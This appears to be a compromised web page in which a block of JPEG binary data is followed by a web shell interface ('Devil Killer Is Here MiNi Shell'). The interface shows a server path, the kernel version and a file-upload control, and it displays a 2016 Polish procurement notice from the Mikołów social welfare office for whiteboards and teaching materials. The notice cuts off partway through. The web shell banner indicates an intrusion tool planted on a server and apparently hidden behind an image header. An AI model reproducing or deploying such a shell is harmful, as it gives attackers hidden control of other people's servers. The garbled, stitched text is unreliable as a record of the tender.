JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161021/328579-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.mops.mikolow.pl/zamownienia-publiczne/zamownienia-publiczne-1' target='_blank'>http://www.mops.mikolow.pl/zamownienia-publiczne/zamownienia-publiczne-1</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 328579 - 2016
              z dnia 2016-10-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Mikołów: Przedmiotem zamowienia jest zakup i sukcesywna dostawa sprzętu i materiałów specjalistycznych na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Mikołowie w tym na potrzeby uczestników projektu Postaw na lepsze jutro realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 dla Osi Priorytetowej IX. Włączenie społeczne dla Działania 9.2 Dostępne i efektywne usługi społeczne i zdrowotne dla Poddziałania 9.2.5 Rozwój usług społecznych.  <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Postaw na lepsze jutro </div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miejski Ośrodek Pomocy Społecznej, krajowy numer identyfikacyjny
              345536200000, ul.
              ul. Kolejowa 
              2,
              43190  
              Mikołów, woj.
              śląskie, państwo
              Polska, tel.
              323 242 666, e-mail
              , faks
              323 242 694.
              <br />
              Adres strony internetowej (URL): http://www.mops.mikolow.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Jednostki organizacyjne administracji samorządowej
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.mops.mikolow.pl/zamownienia-publiczne/zamownienia-publiczne-1</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.mops.mikolow.pl/zamownienia-publiczne/zamownienia-publiczne-1</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />PISEMNIE<br />
                Adres:
                <br />Miejski Ośrodek Pomocy Społecznej w Mikołowie  ul. Kolejowa 2  43-190 Mikołów</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przedmiotem zamowienia jest zakup i sukcesywna dostawa sprzętu i materiałów specjalistycznych na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Mikołowie w tym na potrzeby uczestników projektu Postaw na lepsze jutro realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 dla Osi Priorytetowej IX. Włączenie społeczne dla Działania 9.2 Dostępne i efektywne usługi społeczne i zdrowotne dla Poddziałania 9.2.5 Rozwój usług społecznych.  <br /><b>Numer referencyjny: </b>PN-36/2016/MOPS<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamowienia jest zakup i sukcesywna dostawa sprzętu i materiałów specjalistycznych na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Mikołowie w tym na potrzeby uczestników projektu Postaw na lepsze jutro realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 dla Osi Priorytetowej IX. Włączenie społeczne dla Działania 9.2 Dostępne i efektywne usługi społeczne i zdrowotne dla Poddziałania 9.2.5 Rozwój usług społecznych.  
Część nr 1 zamówienia-  Zakup i sukcesywna dostawa tablic
Część nr 2 zamówienia- Zakup i dostawa sprzętu
Część nr  3 zamówienia- Zakup i dostawa sukcesywna materiałów specjalistycznych i edukacyjnych
<br /><br /><b>II.5) Główny kod CPV: </b>30195900-1<br /><b> Dodatkowe kody CPV:</b>42715000-1,
                22100000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/06/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 02/11/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>-  Zakup i sukcesywna dostawa tablic<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Tablica Suchościeralna magnetyczna z półką (dostawa wraz z montażem): rozmiar  od 90 do 120 cm, szerokość  od 120 do 240 cm, powierzchnia lakierowana, suchościeralna, kolor biały, akcesoria do montażu w zestawie, zestaw markerów (4 markety: zielony, czerwony, czarny i niebieski) do tablicy suchościeralnej z wycierakiem magnetycznym


 
Przykładowy wzór
	1
2	Zestaw akcesoriów do tablicy suchościeralnej:

zestaw akcesoriów do tablic suchościeralnych:
	markery na bazie spirytusu (czerwony, zielony, niebieski, czarny)
	płyn czyszczący w butelce z atomizerem min. 50 ml
	czyścik magnetyczny
	wymienne filce 5 sztuk
	kolorowe magnesy  średnica 16 mm  10 szt	

2 zestawy



3	Tablica interaktywna (dostawa wraz z montażem) zestaw z projektorem wraz z uchwytem,  interfejs USB, współpraca z systemem operacyjnym Windows, przekątna od 77 do 84 cali
 
1
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30195900-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
